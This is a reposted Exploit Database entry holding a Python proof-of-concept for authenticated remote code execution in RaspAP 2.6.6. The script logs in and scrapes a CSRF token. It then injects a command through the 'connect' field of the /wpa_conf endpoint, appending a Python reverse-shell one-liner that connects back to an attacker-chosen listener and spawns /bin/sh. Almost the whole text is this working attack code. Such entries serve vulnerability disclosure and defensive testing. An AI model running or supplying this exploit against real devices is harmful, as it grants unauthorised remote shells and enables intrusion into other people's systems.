RaspAP 2.6.6 – Remote Code Execution (RCE) (Authenticated)

• Exploit Database
• 18 阅读

• 作者： Moritz Gruber
  日期： 2021-08-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50224/

• # Exploit Title: RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated)
  # Date: 23.08.2021
  # Exploit Author: Moritz Gruber <moritz@aware7.de>
  # Vendor Homepage: https://raspap.com/
  # Software Link: https://github.com/RaspAP/raspap-webgui
  # Version: 2.6.6
  # Tested on: Linux raspberrypi 5.10.52-v7+
  
  import requests
  from requests.api import post
  from requests.auth import HTTPBasicAuth
  from bs4 import BeautifulSoup
  import sys, re
  
  if len(sys.argv) != 7:
  print("python3 exec-raspap.py <target-host> <target-port> <username> <password> <reverse-host> <reverse-port>")
  sys.exit()
  else:
  target_host = sys.argv[1]
  target_port = sys.argv[2]
  username = sys.argv[3]
  password = sys.argv[4]
  listener_host = sys.argv[5]
  listener_port = sys.argv[6]
  
  endpoint = "/wpa_conf"
  exploit = f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{listener_host}\",{listener_port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
  url = "http://{}:{}/{}".format(target_host,target_port,endpoint)
  
  s = requests.Session()
  
  get_Request = s.get(url, auth=HTTPBasicAuth(username, password))
  soup = BeautifulSoup(get_Request.text, "lxml")
  csrf_token = soup.find("meta",{"name":"csrf_token"}).get("content")
   
  post_data = {
  "csrf_token": csrf_token,
  "connect": "wlan; {}".format(exploit)
  }
  post_Request = s.post(url, data=post_data, auth=HTTPBasicAuth(username, password))
  if post_Request.status_code:
  print("Exploit send.")
  else:
  print("Something went wrong.")
  print("Done")